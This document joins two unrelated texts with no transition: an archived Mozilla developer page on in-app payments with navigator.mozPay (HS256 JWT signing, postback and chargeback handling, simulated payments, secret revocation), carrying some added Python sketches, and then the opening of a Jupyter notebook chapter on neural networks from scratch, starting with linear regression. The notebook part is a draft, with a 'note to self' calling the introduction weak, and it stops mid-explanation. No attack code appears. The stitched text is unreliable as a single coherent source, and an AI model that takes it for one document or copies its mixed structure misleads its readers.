Use these forums for MonoGame to ask specific questions with issues you are having in learning the engine as the people here are very helpful.
If you want some additional assistance with war-game or military simulation development I can give you a hand with that. Just leave me note here or contact me through my website,
See if you can get hold of this book in your country:
EDIT
It is also available on Kindle | https://community.monogame.net/t/learn-monogame/9443 | CC-MAIN-2022-40 | refinedweb | 863 | 52.23 |
On Tue, Sep 07, 2004 at 01:55:32PM +0200, Christer Weinigel wrote:
> David Masover <ninja@slaphack.com> writes:
>
> > |>Second, there are quite a few things which I might want to do, which can
> > |>be done with this interface and without patching programs,
> > | Such as?
> > They've been mentioned.
>
> > | Haven't seen any that made sense to me, sorry.
> > Sorry if they don't make sense to you, but I don't feel like discussing
> > them now. Either you get it or you don't, either you agree or you
> > don't. Read the archives.
>
> Great argument. Not. There has been so much shit thrown around here
> so that it's impossible to keep track of all examples.
>
> Could you please try summarize a few of the arguments that you find
> especially compelling? This thread has gotten very confused since
> there are a bunch of different subjects all being intermixed here.
>
> What are we discussing?
>
> 1. Do we want support for named streams?
>
>    I belive the answer is yes, since both NTFS and HFS (that's the
>    MacOS filesystem, isn't it?) supports streams we want Linux to
>    support this if possible.

well, yes HFS has this, is it advantageous, no
it's kind of heritage ...

> Anyone disagreeing?

yes, MacOS X allows to use UFS instead of HFS+
which doesn't support the fancy/confusing streams

I, for my part, do not like the idea of multiple
streams for one file, IMHO all features can be
provided by using directories instead, which does
not break any userspace tools _and_ sounds natural
to me ...

best,
Herbert

> 2. How do we want to expose named streams?
>
>    One suggestion is file-as-directory in some form.
>
>    Another suggestion made is to expose named streams somewhere under
>    /proc/self/fd.
>
>    Yet another suggestion is to use the openat(3) API from solaris.
>
>    Some filesystems exposes extra data in a special directory in the
>    same directory as the file, such as netapps .snapshot directories
>    or the extra directories that netatalk expects. This has the
>    advantage that it even works on non-named stream capable
>    filesystems, but it has a lot of problems too.
>
>    Linux already has limited support for names streams via the xattr
>    interface, but it's not a good interface for people wanting to
>    have large files as named streams.
>
> 4. What belongs in the generic VFS, what belongs in Reiser4?
>
>    Some things reiser4 do, such as files-as-directories need changes
>    to the VFS because it breaks assumptions that the VFS makes
>    (i.e. a deadlock or an oops when doing a hard link out of one).
>
>    Some other things reiser4 can do would be better if they were in
>    the VFS since other filesystems might want to support the same
>    functionality.
>
>    Or Linux may not support some of the things reiserfs at all.
>
> 5. What belongs in the kernel, what belongs in userspace?
>
>    This is mostly what I have been trying to argue about.
>
> So, to try to summarize my opinion, regarding file-as-directory, I
> belive it's fatally flawed because it breaks a lot of assumptions that
> existing code make. One example of an application that will break is
> a web server that tries to filter out accesses to "bad" files,
> files-as-directories suddenly means that part of those files will be
> accessible (and there are a _lot_ of CERT reports on just this kind of
> problems with Windows web servers due to access to named streams not
> being restricted or ways to access files with non-canonical names that
> also managed to bypass access restrictions).
>
> Files-as-directories also does not give us named streams on
> directories. The suggestion to have dir/metas access the named
> streams means that if someone already has a file named metas in a
> directory that file will be lost. (Does anyone remember the
> discussions about the linux kernel having a directory named "core" and
> the problems this caused for some people?)
>
> All this suggests to me that named streams must live in another
> namespace than the normal one. To me, openat(3) seems like a good
> choice for an API and it has the advantage that someone else, Solaris,
> already has implemented it.
>
> .
>
> Regarding the kernel or userspace discussion. In my opinion anything
> that can be done in user space should be done in userspace. If the
> performance sucks, or it has security problems, or needs caching that
> cant be solved in userspace it can be moved to the kernel, but in that
> case the smallest and cleanest API possible should be implemented.
>
> If, for historical reasons, an API must be in the kernel, there is not
> much we can do about it either. It'll have to stay there, but we can
> avoid making the same mistakes again.
>
> So, for all the examples of the kernel having plugins that
> automatically lets an application see a tar-file as a directory, I
> really, really don't belive this belongs in the kernel. First of all,
> this is the file-as-directory discussion again, I belive it is a
> mistake to expose the contents as a directory on top of the file
> because it breaks a lot of assumptions that unix programs make.
>
> It's much better to expose the contents at another place in the
> filesystem by doing a temporary mount of the file with the proper
> filesystem. As Pavel Machek pointed out, this has the problem of who
> cleans up the mount if the application crashes. One way to handle
> this could be something like this:
>
> mount -t tarfs -o loop bar.tar /tmp/bar-fabb50509
> chdir /tmp/bar-fabb50509
> umount -f /tmp/bar-fabb50509
>
> This will require the ability to unmount busy filesystems (but I
> belive Alexander Viro already has implemented the infrastructure
> needed for this).
>
> Or for files that we don't have a real filesystem driver (or on other
> systems where userspace mounts are not allowed), we could just unpack
> the contents into /tmp. For cleanup we could let whatever cleans up
> /tmp anyways handle it, or have a cache daemon that keeps track of
> untarred directories and removes them after a while.
>
> Another way is to completely forget about presenting the contents of a
> tar file as a real files, and just use a shared library to get at the
> contents (now we just have to convince everyone to use the shared
> library). This would also be portable to other systems.
>
> If we do this right, it could all be hidden in a shared library, and
> if the system below it supports more advanced features, it can use it.
>
> Regarding the "I want a realtime index of all files". I belive that a
> notifier that can tell me when a file has been changed and a userspace
> daemon ought to handle most of the cases that have been mentioned.
> The suggested problems of not getting an up to date query response can
> be handled by just asking the daemon "are you done with indexing yet".
> The design of such a daemon and the support it needs from the kernel
> can definitely be discussed. But to put the indexer itself in the
> kernel sounds like a bad idea. Even adding an API to query the
> indexer into the kernel sounds pointless, why do that instead of just
> opening a Unix socket to the indexer and asking it directly?
>
> /Christer
>
> --
> "Just how much can I get away with and still go to heaven?"
>
> Freelance consultant specializing in device driver programming for Linux
> Christer Weinigel <christer@weinigel
When it is required to sort a matrix based on palindrome count, a method is defined that takes a list as a parameter. It uses a list comprehension and the 'join' method to iterate and check whether each element is a palindrome. Based on this count, the rows are ordered and the result is displayed.
Below is a demonstration of the same
def get_palindrome_count(row):
    return len([element for element in row if ''.join(list(reversed(element))) == element])

my_list = [["abcba", "hdgfue", "abc"], ["peep"], ["py", "is", "best"], ["sees", "level", "non", "noon"]]

print("The list is :")
print(my_list)

my_list.sort(key=get_palindrome_count)

print("The resultant list is :")
print(my_list)
The list is :
[['abcba', 'hdgfue', 'abc'], ['peep'], ['py', 'is', 'best'], ['sees', 'level', 'non', 'noon']]
The resultant list is :
[['py', 'is', 'best'], ['abcba', 'hdgfue', 'abc'], ['peep'], ['sees', 'level', 'non', 'noon']]
A method named ‘get_palindrome_count’ is defined that takes a list as parameter.
List comprehension is used to iterate over the list and see if the element is a palindrome or not.
If yes, it is returned.
Outside the method, a list of list with string values is defined and is displayed on the console.
The ‘sort’ method is used to sort the list based on the key being the previously defined method.
This is displayed as the output on the console.
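The same sort can also be written with sorted() and a lambda; e == e[::-1] is an equivalent palindrome check, and since Python's sorts are stable, rows with equal counts keep their original order:

```python
my_list = [["abcba", "hdgfue", "abc"], ["peep"], ["py", "is", "best"], ["sees", "level", "non", "noon"]]

# Key: number of palindromic strings in each row
result = sorted(my_list, key=lambda row: sum(e == e[::-1] for e in row))

print(result)
```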
Create a C# program which asks the user for two numbers and answers, using the conditional operator (?), the following:
6
4
A is positive
B is positive
Both are positive
using System;
public class ConditionalOperator
{
public static void Main(string[] args)
{
int a = Convert.ToInt32(Console.ReadLine());
int b = Convert.ToInt32(Console.ReadLine());
Console.WriteLine(a > 0 ? "A is positive" : "A is not positive");
Console.WriteLine(b > 0 ? "B is positive" : "B is not positive");
Console.WriteLine((a > 0) && (b > 0) ? "Both are positive" : "Not both are positive");
}
}
So I have been using React for about 10 months now after switching from a framework I thought I would never leave. You guessed it 🤗 Angular.
When my colleague introduced me to React, I said to my self how can this guy introduce me to such a mess, writing jsx was a bit weird to me at first but trust me once you start writing jsx you will never go back.
I started looking for design patterns to make my react code clean and reusable. During this journey, I came across compound components and I started using them with a CSS-in-JS library (styled-components), and I have to say this😎 I was in love😍. My code looked clean and it was also easy to debug.
If you have used a native HTML
<select> and
<option> you can easily understand the concept behind compound components.
<select> <option value="value1">key1</option> <option value="value2">key2</option> <option value="value3">key3</option> </select>
If you try to use one without the other it would not work, and also it doesn't make sense.
Now, let's get a look at our React
<Table /> component that exposes a compound component to understand these principles further. Here is how it looks like.
<Table>
  <Table.Head>
    <Table.TR>
      <Table.TH>Heading 1</Table.TH>
      <Table.TH>Heading 2</Table.TH>
    </Table.TR>
  </Table.Head>
  <Table.Body>
    <Table.TR>
      <Table.TH>data 1</Table.TH>
      <Table.TH>data 2</Table.TH>
    </Table.TR>
    <Table.TR>
      <Table.TH>data 3</Table.TH>
      <Table.TH>data 4</Table.TH>
    </Table.TR>
  </Table.Body>
</Table>
But before we get to that, this is how I structure my components. Let me know if you have a better way of structuring components I would love to try it out.
📦components
 ┣ 📂table
 ┃ ┣ 📂styles
 ┃ ┃ ┗ 📜table.js
 ┃ ┗ 📜index.js
All my styles will be in the styles directory and index.js file imports the styled components from the styles directory. Below is how I will style my table. We are ignoring css however just to keep the post short.
import styled from 'styled-components';

export const StyledTable = styled.table`
  // custom css goes here
`;

export const THead = styled.thead`
  // custom css goes here
`;

export const TFoot = styled.tfoot`
  // custom css goes here
`;

export const TBody = styled.tbody`
  // custom css goes here
`;

export const TR = styled.tr`
  // custom css goes here
`;

export const TH = styled.th`
  // custom css goes here
`;

export const TD = styled.td`
  // custom css goes here
`;
Now in the index.js that's where all the action is. Remember with our table component we are exporting just the table component and the other components we accessing them from the table component using the dot notation.
import { StyledTable, THead, TBody, TFoot, TH, TR, TD } from './styles/table';

export const Table = ({ children, ...rest }) => {
  return <StyledTable {...rest}>{children}</StyledTable>;
};

Table.Head = ({ children, ...rest }) => {
  return <THead {...rest}>{children}</THead>;
};

Table.Body = ({ children, ...rest }) => {
  return <TBody {...rest}>{children}</TBody>;
};

Table.Foot = ({ children, ...rest }) => {
  return <TFoot {...rest}>{children}</TFoot>;
};

Table.TH = ({ children, ...rest }) => {
  return <TH {...rest}>{children}</TH>;
};

Table.TR = ({ children, ...rest }) => {
  return <TR {...rest}>{children}</TR>;
};

Table.TD = ({ children, ...rest }) => {
  return <TD {...rest}>{children}</TD>;
};
I know I have to explain some things here like how we are accessing these other components when we are not directly exporting them and how the children prop works.
The only component that we are exporting here is the
<Table/> component which wraps the
<StyledTable/> component. We then use the dot notation to attach other components to the
<Table/> component. If we were using class components we will use the static keyword to do the same thing. We can now for example access the styled table row like so
<Table.TR/>
Anything passed between the opening and closing tags of a component can be accessed using the
children prop in react, for example, if we write this code
<Table.TR>data</Table.TR>, props.children will be equal to 'data'. That's basically how the children prop works.
We want the end-users of our components to be able to customize them so we are taking everything they are passing as props and spread it on the styled component using the object destructuring syntax
{..rest}.
I hope this post helped you understand compound components. Feel free to comment on areas you need clarity I will respond, or areas you think I need to improve. In the future, we will create a dropdown component using this pattern but now there will be state and we will be using custom hooks and the Context API to manage the state of the dropdown.
Discussion (2)
Cool. Thank you. New to the React world. Might take you up on that. Great article.
Glad it helped, I am thinking of sharing my folder structure before I get into some of these concepts. Its one of the areas I struggled with when I got started with react. | https://dev.to/josemukorivo/create-a-reusable-table-with-react-styled-components-and-compound-components-design-pattern-40cn | CC-MAIN-2021-21 | refinedweb | 846 | 65.52 |
AWS Storage Blog

Working with large amounts of data often means confronting the difficulty entailed in efficiently searching through that data for what you need.
In this post, we cover using structured query language (SQL) queries to search through data loaded to Amazon Simple Storage Service (Amazon S3) as a comma-separated value (CSV) file. Previously, the data would need to be loaded into a database to be queried. In addition to deploying a database, the customer would have needed to deploy an application and website to enable the search. Instead of deploying a database and associated resources, we instead leverage an S3 feature called S3 Select to create a phone book search tool that is completely serverless.
We first show the basics of executing SQL queries to return results from a simple phone book .csv file. To explore this solution a bit further, we create a sample phone book search tool on the AWS Samples GitHub page that includes all the necessary components to create a completely serverless phone book search application.
Customers leverage Amazon S3 to store and protect any amount of data without provisioning storage or managing infrastructure. Amazon S3 Select and Amazon S3 Glacier Select enable customers to run SQL queries directly on data stored in S3 and Amazon S3 Glacier. With S3 Select, you simply store your data on S3 and query using SQL statements to filter the contents of S3 objects, retrieving only the data that you need. By retrieving only a subset of the data, customers reduce the amount of data that Amazon S3 transfers, which reduces the cost and latency of retrieving this data. Reducing cost and complexity enables AWS customers to move faster and reduce the amount of time required to deliver value to their businesses and their customers.
S3 Select works on objects stored in CSV, JSON, or Apache Parquet format. S3 Select also supports compression on CSV and JSON objects with GZIP or BZIP2, and server-side encrypted objects. You can perform SQL queries using AWS SDKs, the SELECT Object Content REST API, the AWS Command Line Interface (AWS CLI), or the AWS Management Console.
Featured AWS services
Our simple phone book application leverages the following AWS services:
- Amazon S3 is an object storage service that offers industry-leading scalability, data availability, security, and performance.
- S3 Select enables applications to retrieve only a subset of data from an S3 object by using simple SQL expressions.
In addition to S3 and S3 Select, the Amazon S3 Select – Phonebook Search GitHub sample project includes the following services:
- Amazon API Gateway is a fully managed service that makes it easy for developers to create, publish, maintain, monitor, and secure APIs at any scale. Amazon API Gateway is a common component of serverless applications and will be used to interact with AWS Lambda.
- AWS Lambda lets you run code without provisioning or managing servers. The S3 Select query in our sample project will be executed with AWS Lambda.
- AWS CloudFormation provides a common language for you to model and provision AWS and third-party application resources in your cloud environment. CloudFormation is used for our sample app to orchestrate the deployment of the resources required for the sample project with minimal effort.
Sample Code
Sample code for this project exists in the AWS-Samples GitHub repository and the high-level details are outlined below.
Getting started
Since S3 Select runs directly on S3 with data stored in your S3 bucket, all you need to get started is an AWS account and an S3 bucket.
Sign in to your existing AWS account, or create a new AWS account. Once you sign in, create an S3 bucket to be used for testing with S3 Select.
The data we use for testing is a simple CSV file containing the Name, Phone Number, City, and Occupation of our users. The raw data of the CSV file is below, and available in GitHub, so feel free to download the file and edit it as well!
Name,PhoneNumber,City,Occupation
Sam,(949) 555-6701,Irvine,Solutions Architect
Vinod,(949) 555-6702,Los Angeles,Solutions Architect
Jeff,(949) 555-6703,Seattle,AWS Evangelist
Jane,(949) 555-6704,Chicago,Developer
Sean,(949) 555-6705,Chicago,Developer
Mary,(949) 555-6706,Chicago,Developer
Kate,(949) 555-6707,Chicago,Developer
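S3 Select performs this filtering server-side, but to build intuition it can help to picture the equivalent local operation. The sketch below is a hypothetical helper (not part of the sample project) that filters the same CSV by name using Python's csv module:

```python
import csv
import io

SAMPLE_CSV = """Name,PhoneNumber,City,Occupation
Sam,(949) 555-6701,Irvine,Solutions Architect
Vinod,(949) 555-6702,Los Angeles,Solutions Architect
Jeff,(949) 555-6703,Seattle,AWS Evangelist
Jane,(949) 555-6704,Chicago,Developer
Sean,(949) 555-6705,Chicago,Developer
Mary,(949) 555-6706,Chicago,Developer
Kate,(949) 555-6707,Chicago,Developer
"""

def filter_by_name(csv_text, name):
    """Return rows whose Name column matches, like
    SELECT * FROM s3object s WHERE s."Name" = '<name>'."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return [row for row in reader if row["Name"] == name]

rows = filter_by_name(SAMPLE_CSV, "Jane")
print(rows[0]["City"])  # Chicago
```

With S3 Select, this scan happens inside S3 itself, so only the matching rows cross the network.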
Upload the sample_data.csv file to your new S3 bucket.
To quickly test, we run the following in Python, which queries the “sample_data.csv” object in our S3 bucket named “s3select-demo.” Please note the bucket name must be changed to reflect the name of the bucket you created.
To get set up for this quick test, we deploy a t3.micro EC2 instance running Amazon Linux 2 and install boto3 using the pip command. Be sure to attach an IAM role with appropriate permissions to the instance.
Configuring an EC2 instance to run S3 Select queries
Once the instance is running, log in as an ec2-user and run the following commands to setup your environment:
sudo yum update -y
sudo yum install python3 -y
python3 -m venv ~/s3select_example/env
source ~/s3select_example/env/bin/activate
pip install pip --upgrade
pip install boto3
wget
wget
The steps above create a Python 3 virtual environment and download a Python file called jane.py with the following contents. This file lets us search for users with the first name Jane. Note that you must replace the S3 bucket name to match your S3 bucket.
import boto3

s3 = boto3.client('s3')

resp = s3.select_object_content(
    Bucket='s3select-demo',
    Key='sample_data.csv',
    ExpressionType='SQL',
    Expression="SELECT * FROM s3object s where s.\"Name\" = 'Jane'",
    InputSerialization = {'CSV': {"FileHeaderInfo": "Use"}, 'CompressionType': 'NONE'},
    OutputSerialization = {'CSV': {}},
)

# The response payload is an event stream containing Records and Stats events.
for event in resp['Payload']:
    if 'Records' in event:
        print(event['Records']['Payload'].decode('utf-8'))
    elif 'Stats' in event:
        statsDetails = event['Stats']['Details']
        print("Stats details bytesScanned: " + str(statsDetails['BytesScanned']))
        print("Stats details bytesProcessed: " + str(statsDetails['BytesProcessed']))
        print("Stats details bytesReturned: " + str(statsDetails['BytesReturned']))

The OutputSerialization field is set to CSV, so this prints the results matching "Jane" as CSV. This could be set to JSON if preferred for your use case.
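If you prefer JSON output, only the OutputSerialization argument changes. The helper below is hypothetical, shown for illustration; it builds the keyword arguments for select_object_content in either format:

```python
def build_select_kwargs(bucket, key, expression, output_format="CSV"):
    """Build keyword arguments for s3.select_object_content.

    output_format may be 'CSV' or 'JSON'; anything else is rejected.
    """
    if output_format == "CSV":
        output = {"CSV": {}}
    elif output_format == "JSON":
        # RecordDelimiter separates the returned JSON records.
        output = {"JSON": {"RecordDelimiter": "\n"}}
    else:
        raise ValueError("output_format must be 'CSV' or 'JSON'")
    return {
        "Bucket": bucket,
        "Key": key,
        "ExpressionType": "SQL",
        "Expression": expression,
        "InputSerialization": {"CSV": {"FileHeaderInfo": "Use"},
                               "CompressionType": "NONE"},
        "OutputSerialization": output,
    }

kwargs = build_select_kwargs(
    "s3select-demo", "sample_data.csv",
    "SELECT * FROM s3object s WHERE s.\"Name\" = 'Jane'",
    output_format="JSON")
```

You would then call s3.select_object_content(**kwargs) exactly as before.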
Executing an S3 Select query
After changing the S3 bucket name in the jane.py file to match the S3 bucket name you created, run the query using the following command:
python jane.py
This results in the output below:
Jane,(949) 555-6704,Chicago,Developer
Stats details bytesScanned: 326
Stats details bytesProcessed: 326
Stats details bytesReturned: 38
The match for the user Jane shows up, along with some optional details we added to show the data scanned, processed, and returned by S3 Select. In this case, the sample_data.csv is 326 bytes. S3 Select scans the entire file and returns only 38 bytes.
S3 Select with compressed data
Let’s run the same test again but this time after compressing and uploading a GZIP version of the phonebook saved as sample_data.csv.gz. This file is also available for download from GitHub.
The modifications in your Python code are to change the Key to the gzip'd object and to change the InputSerialization CompressionType from 'NONE' to 'GZIP'. The new version of the Python script is saved as jane-gzip.py and is available on the AWS Samples GitHub page as well.
We changed the object key name to specify the gzip file:
Key='sample_data.csv.gz',
And we changed the InputSerialization line to change the CompressionType to GZIP:
InputSerialization = {'CSV': {"FileHeaderInfo": "Use"}, 'CompressionType': 'GZIP'},
The full file of jane-gzip.py is below. Note you must replace the current S3 bucket name to match the name of your S3 bucket.
import boto3

s3 = boto3.client('s3')

resp = s3.select_object_content(
    Bucket='s3select-demo',
    Key='sample_data.csv.gz',
    ExpressionType='SQL',
    Expression="SELECT * FROM s3object s where s.\"Name\" = 'Jane'",
    InputSerialization = {'CSV': {"FileHeaderInfo": "Use"}, 'CompressionType': 'GZIP'},
    OutputSerialization = {'CSV': {}},
)

for event in resp['Payload']:
    if 'Records' in event:
        print(event['Records']['Payload'].decode('utf-8'))
    elif 'Stats' in event:
        statsDetails = event['Stats']['Details']
        print("Stats details bytesScanned: " + str(statsDetails['BytesScanned']))
        print("Stats details bytesProcessed: " + str(statsDetails['BytesProcessed']))
        print("Stats details bytesReturned: " + str(statsDetails['BytesReturned']))

The following command executes an S3 Select query on the gzip file:
python jane-gzip.py
This results in the output below:
Jane,(949) 555-6704,Chicago,Developer
Stats details bytesScanned: 199
Stats details bytesProcessed: 326
Stats details bytesReturned: 38
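The Records and Stats lines above arrive as an event stream in resp['Payload']. A small illustrative helper (the event shapes below mirror what boto3 returns) can separate record bytes from the stats:

```python
def collect_select_results(events):
    """Accumulate record text and stats from a select_object_content
    event stream. Returns (records_text, stats_dict_or_None)."""
    records, stats = [], None
    for event in events:
        if "Records" in event:
            records.append(event["Records"]["Payload"].decode("utf-8"))
        elif "Stats" in event:
            stats = event["Stats"]["Details"]
    return "".join(records), stats

# Simulated event stream matching the output shown above.
fake_events = [
    {"Records": {"Payload": b"Jane,(949) 555-6704,Chicago,Developer\n"}},
    {"Stats": {"Details": {"BytesScanned": 326,
                           "BytesProcessed": 326,
                           "BytesReturned": 38}}},
]
text, stats = collect_select_results(fake_events)
print(text.strip())            # Jane,(949) 555-6704,Chicago,Developer
print(stats["BytesReturned"])  # 38
```

Records may arrive split across multiple events for larger results, which is why the helper accumulates them before joining.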
Comparing results of compressed and uncompressed data
Using gzip compression saves space on S3 and reduces the amount of data processed. In the case of our small CSV file for this test, using compression results in a 39% space savings.
The following table shows the difference when executing S3 Select against the two files, sample_data.csv and sample_data.csv.gz.

| File | File size (bytes) | Bytes scanned | Bytes processed | Bytes returned |
| --- | --- | --- | --- | --- |
| sample_data.csv | 326 | 326 | 326 | 38 |
| sample_data.csv.gz | 199 | 199 | 326 | 38 |
Taking advantage of data compression gets more interesting with larger files, like a 133,975,755-byte CSV file (~128 MB) consisting of ~1,000,000 lines. In testing such a file, the file size was reduced by ~60% down to 50,308,104 bytes (~50.3 MBytes) with GZIP compression.
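The space savings quoted above are easy to verify. For the small file, 326 → 199 bytes is roughly 39%; for the large file, 133,975,755 → 50,308,104 bytes comes out to about 62%, which the post rounds to ~60%:

```python
def savings(original_bytes, compressed_bytes):
    """Fractional space saved by compression."""
    return 1 - compressed_bytes / original_bytes

print(round(savings(326, 199) * 100))                  # 39
print(round(savings(133_975_755, 50_308_104) * 100))   # 62
```

The same arithmetic applies to the bytesScanned figures, since S3 Select scans the compressed object rather than the expanded data.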
Querying Archives with S3 Glacier Select
When you provide an SQL query for a S3 Glacier archive object, S3 Glacier Select runs the query in place and writes the output results to Amazon S3. With S3 Glacier Select, you can run queries and custom analytics on data stored in S3 Glacier without having to restore your data to a hotter tier like S3 Standard.
When you perform select queries, S3 Glacier provides three data access tiers—expedited, standard, and bulk. All of these tiers provide different data access times and costs, and you can choose any one of them depending on how quickly you want your data to be available. For all but the largest archives (250 MB+), data that is accessed using the expedited tier is typically made available within 1–5 minutes. The standard tier finishes within 3–5 hours. The bulk retrievals finish within 5–12 hours.
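With S3 Glacier, the query is submitted through a restore request rather than select_object_content, and the results are written to a bucket you choose. The sketch below builds such a request; the field names follow the S3 restore_object API, and the bucket and prefix are placeholders:

```python
def build_glacier_select_restore(expression, output_bucket, output_prefix,
                                 tier="Standard"):
    """Build the RestoreRequest dict for an S3 Glacier Select query.
    Results are written to s3://<output_bucket>/<output_prefix>."""
    return {
        "Type": "SELECT",
        "Tier": tier,  # 'Expedited', 'Standard', or 'Bulk'
        "SelectParameters": {
            "InputSerialization": {"CSV": {"FileHeaderInfo": "USE"}},
            "ExpressionType": "SQL",
            "Expression": expression,
            "OutputSerialization": {"CSV": {}},
        },
        "OutputLocation": {
            "S3": {"BucketName": output_bucket, "Prefix": output_prefix}
        },
    }

req = build_glacier_select_restore(
    "SELECT * FROM archive a WHERE a.\"Name\" = 'Jane'",
    "s3select-demo", "glacier-results/")
# You would then submit it with:
# s3.restore_object(Bucket=..., Key=..., RestoreRequest=req)
```

Choosing the Tier here is what selects between the expedited, standard, and bulk access times described above.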
Conclusion
In this post, we showed how S3 Select provides a simple way to execute SQL queries directly on data stored in Amazon S3 or Amazon S3 Glacier. S3 Select can run against data stored in S3, enabling customers to use this feature to process data uploaded to S3, either programmatically or from services such as AWS Transfer for SFTP (AWS SFTP). For example, customers could upload data directly to S3 using AWS SFTP and then query the data using S3 Select. This work can be automatically triggered by an AWS Lambda execution after a new CSV object is uploaded to S3 with S3 Event Notifications. Searching through your data using S3 Select can potentially save you the time and money spent combing through data in other ways.
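To wire up that automation, a Lambda handler only needs the bucket and key of the newly uploaded object from the S3 event notification. A minimal, hypothetical extraction helper, exercised against the documented event shape:

```python
def extract_s3_objects(event):
    """Yield (bucket, key) pairs from an S3 event notification payload."""
    for record in event.get("Records", []):
        s3_info = record["s3"]
        yield s3_info["bucket"]["name"], s3_info["object"]["key"]

# A trimmed-down S3 Event Notification payload for illustration.
sample_event = {
    "Records": [
        {"s3": {"bucket": {"name": "s3select-demo"},
                "object": {"key": "sample_data.csv"}}}
    ]
}
print(list(extract_s3_objects(sample_event)))
# [('s3select-demo', 'sample_data.csv')]
```

The handler would then pass each (bucket, key) pair to select_object_content as shown earlier in this post.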
To get more hands-on with S3 Select, we encourage you to head over to the AWS Samples GitHub repo. There you can find sample code for the simple phonebook application, so you can get more hands-on time with S3 Select. The sample application offloads the S3 Select query to AWS Lambda, which is invoked through Amazon API Gateway.
Cleaning up
In our sample, we created an S3 bucket, uploaded a .csv file (sample_data.csv), and queried the data using a t3.micro EC2 instance. To clean up the environment, shut down and terminate the EC2 instance and delete the sample_data.csv file from your S3 bucket. You can also choose to delete the S3 bucket you used for testing. These steps ensure that there are no further costs to your account from this sample.
Additional Resources
- GitHub repo that includes a .csv phonebook file and the necessary code required to deploy this sample application
- AWS Samples GitHub includes sample code for multiple AWS services and example use cases
- Amazon S3 Select documentation
- SQL reference for Amazon S3 Select.
- AWS Transfer for SFTP
- Using AWS Lambda with Amazon S3 Events | https://aws.amazon.com/blogs/storage/querying-data-without-servers-or-databases-using-amazon-s3-select/ | CC-MAIN-2021-21 | refinedweb | 1,859 | 53.71 |